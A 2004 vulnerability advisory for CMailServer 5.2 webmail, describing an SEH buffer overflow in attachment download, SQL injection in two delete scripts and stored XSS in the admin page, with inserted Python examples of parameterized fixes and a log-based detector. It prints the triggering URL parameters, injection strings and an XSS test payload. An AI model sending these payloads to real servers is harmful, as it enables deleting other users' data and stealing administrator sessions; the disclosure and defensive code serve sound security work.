by Tan Chew Keong
Release Date: 24 Nov 2004
CMailServer is a small and easy-to-use mail server and web mail software package. It enables you to send and receive
emails across the Internet or within the LAN and supports client email applications such as Outlook, Eudora, etc.
CMailServer also provides a Hotmail-like Web Mail service based on ASP scripts.
Multiple vulnerabilities were found in CMailServer's Web Mail service, including a buffer overflow, SQL injection and
cross-site scripting (XSS).
Tested on CMailServer Version 5.2 on English Win2K.
1. Buffer overflow in CMailCOM.dll's attachment download method may allow arbitrary code execution
CMailServer WebMail allows a user to download his/her email file attachment. Attachment
download is handled by download.asp. download.asp uses the attachment download method of
CMailServer's ActiveX object (CMailCOM.dll) to retrieve the file. The download method has a
buffer overflow vulnerability when handling an overly long filename.
http://[hostname]/mail/download.asp?urlOfAttach=/maildata/A..[approx 290 bytes]..A
This is due to an unsafe sprintf call similar to the one shown below, which concatenates the installation path and the
user-supplied filename into a fixed-size buffer without checking the resulting length.
sprintf(buffer, "%s%s", "C:\\CMAILS~1", "/maildata/A....A");
Approximately 290 bytes in the filename after "/maildata/" will overwrite SEH, depending on
CMailServer's installation path. Arbitrary code execution is possible by using the
overwritten SEH to transfer control to shellcode. Shellcode must not contain "..", ":" and "%". The following
diagram shows the EIP overwritten with an overly long filename.
2. SQL Injection in fdelmail.asp allows deleting of other users' mail metadata
When a user moves his/her emails to the Send, Draft, Favorites or Trash Bin folders, the
metadata of each mail (e.g. mailid, uid, subject, size, etc.) is saved to the "mailfolder"
table in db.mdb. When the user chooses to "Delete Permanently" an email from his/her folder,
the corresponding metadata of the email is deleted from the "mailfolder" table using
the following query in fdelmail.asp.
sql = "delete from mailfolder where account= '" & Session("Account") & "' and uid = '" & arrString(i) & "'"
The argument arrString(i) contains a parameter that is passed from the browser and is under
the user's control. It is possible to inject SQL statements like ' or '1'='1 to delete all
mail metadata in "mailfolder", including mail metadata not belonging to the current user. The
users' email data still exists on the server, but deletion of the metadata will prevent
users from accessing their email from the web interface.
The vulnerable parameter is shown below.
indexOfMail=user2.xxx.yyy.com.cmailserver.3'%20or%20'1'='1%3B
Other scripts like postmail.asp and fmvmail.asp may also be vulnerable.
3. SQL Injection in addressc.asp allows deleting of other users' email address contacts
Email address contacts added by WebMail users are saved in the address table of db.mdb. The following
SQL statement is used in addressc.asp to allow a user to delete email address contacts that
he/she has added.
strSql = "delete from address where account= '" & Session("Account") & "' and addressid = " & arrString(nI)
The argument arrString(nI) contains a parameter that is passed from the browser and is under
the user's control. It is possible to inject SQL statements like "or 1=1" to delete all email
address contacts from the address table, including email address contacts not belonging to the
current user.
The vulnerable parameter is shown below.
indexOfMail=5%20or%201=1%3B
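The two delete statements quoted above (fdelmail.asp and addressc.asp), rebuilt on an in-memory SQLite database to show why pasting the browser-supplied value into the SQL text lets one user's request remove every user's rows, and the parameterized form a fix would use. This is an added example, not CMailServer's code; the table layouts and rows are constructed for the demo, and Access/JET is assumed to evaluate these statements the same way.

```python
import sqlite3

def fresh_db():
    """Two users, each owning mail metadata and address-book rows (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table mailfolder (account text, uid text, subject text)")
    db.execute("create table address (account text, addressid integer, email text)")
    db.executemany("insert into mailfolder values (?,?,?)", [
        ("user1", "user1.mail.1", "hello"), ("user1", "user1.mail.2", "invoice"),
        ("user2", "user2.mail.1", "notes"), ("user2", "user2.mail.2", "lunch")])
    db.executemany("insert into address values (?,?,?)", [
        ("user1", 1, "a@example.com"), ("user1", 2, "b@example.com"),
        ("user2", 5, "c@example.com"), ("user2", 6, "d@example.com")])
    return db

def rows(db, table):
    """Rows left in one of the two demo tables, to observe what a delete removed."""
    assert table in ("mailfolder", "address")
    return db.execute("select count(*) from " + table).fetchone()[0]

def delete_mail_vulnerable(db, account, uid):
    """Mirrors fdelmail.asp: the uid from the browser is spliced into the SQL text."""
    db.execute("delete from mailfolder where account= '" + account
               + "' and uid = '" + uid + "'")
    return rows(db, "mailfolder")

def delete_address_vulnerable(db, account, addressid):
    """Mirrors addressc.asp: numeric context, so the payload needs no quote at all."""
    db.execute("delete from address where account= '" + account
               + "' and addressid = " + addressid)
    return rows(db, "address")

def delete_mail_fixed(db, account, uid):
    """Bound parameter: the value can never alter the statement's structure."""
    db.execute("delete from mailfolder where account = ? and uid = ?", (account, uid))
    return rows(db, "mailfolder")

def delete_address_fixed(db, account, addressid):
    """Validate the type first, then bind it."""
    if not addressid.isdigit():
        raise ValueError("addressid must be a positive integer")
    db.execute("delete from address where account = ? and addressid = ?",
               (account, int(addressid)))
    return rows(db, "address")
```

With the injected values the vulnerable functions return 0 rows left in the table, while the fixed ones delete only the caller's own row or reject the input.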
4. XSS vulnerability in admin.asp when displaying users' personal info.
The admin.asp script displays the username, name, comments and other details of each user to the
WebMail administrator. A malicious user may enter JavaScript in his own personal info using
setpersoninfo.asp. Because HTML special characters are not filtered, this JavaScript will
execute in the WebMail administrator's browser when the administrator views the admin.asp
script. Such JavaScript may be crafted to steal the administrator's session cookie, etc.
For example, the user may set his name to <script>alert('XSS');</script>
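Request-level detection for issues 1 to 3 above, run over constructed web server log lines: an oversized or non-printable urlOfAttach to download.asp, and SQL metacharacters in indexOfMail to the scripts named in the advisory. This is an added example, not part of the advisory; the IIS W3C-style field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) and the length threshold are assumptions a defender would adjust to their own logging.

```python
import re
from urllib.parse import unquote

MAX_ATTACH_LEN = 128   # assumed threshold, well below the ~290 bytes that reach the SEH record
SQLI_SCRIPTS = {"/mail/fdelmail.asp", "/mail/addressc.asp",
                "/mail/postmail.asp", "/mail/fmvmail.asp"}
SQLI_PATTERN = re.compile(r"'|;|\bor\b\s*\S+\s*=", re.IGNORECASE)

def parse_query(query):
    """Split a cs-uri-query field into {name: URL-decoded value}."""
    params = {}
    if query in ("", "-"):
        return params
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params[name] = unquote(value)
    return params

def classify(line):
    """Return alert strings for one log line; an empty list means benign."""
    fields = line.split()
    if len(fields) < 6:
        return []
    stem, params = fields[4].lower(), parse_query(fields[5])
    alerts = []
    if stem == "/mail/download.asp":
        attach = params.get("urlOfAttach", "")
        if len(attach) > MAX_ATTACH_LEN:
            alerts.append("download.asp: oversized urlOfAttach (overflow attempt)")
        if any(not 0x20 <= ord(c) <= 0x7e for c in attach):
            alerts.append("download.asp: non-printable bytes in urlOfAttach")
    if stem in SQLI_SCRIPTS and SQLI_PATTERN.search(params.get("indexOfMail", "")):
        alerts.append(stem + ": SQL metacharacters in indexOfMail")
    return alerts

# Constructed sample traffic: benign and suspicious requests to the affected scripts.
SAMPLE_LOG = [
    "2004-11-24 10:00:01 10.0.0.5 GET /mail/download.asp urlOfAttach=/maildata/report.doc 200",
    "2004-11-24 10:00:02 10.0.0.9 GET /mail/download.asp urlOfAttach=/maildata/" + "A" * 290 + " 500",
    "2004-11-24 10:00:03 10.0.0.9 GET /mail/fdelmail.asp "
    "indexOfMail=user2.xxx.yyy.com.cmailserver.3'%20or%20'1'='1%3B 200",
    "2004-11-24 10:00:04 10.0.0.7 GET /mail/addressc.asp indexOfMail=5 200",
    "2004-11-24 10:00:05 10.0.0.9 GET /mail/addressc.asp indexOfMail=5%20or%201=1%3B 200",
]
```

Running `classify` over SAMPLE_LOG flags lines 2, 3 and 5 and leaves the two benign requests unflagged.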
Vulnerability test code for CMailCOM.dll buffer overflow for English Win2K SP4. Binds shell
on port 2001 with IWAM_MACHINE privilege.
- Update to the latest version of CMailServer. CMailServer v5.2.1 fixes these vulnerabilities.
12 Nov 04 - Vulnerability Discovered.
13 Nov 04 - Initial Vendor Notification by Email and Web Form.
16 Nov 04 - Initial Vendor Reply.
21 Nov 04 - Vendor provided patched version for testing.
21 Nov 04 - Notified Vendor that a patch did not work.
21 Nov 04 - Vendor provided updated version for testing.
24 Nov 04 - Public Release
For further questions and enquiries, email the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg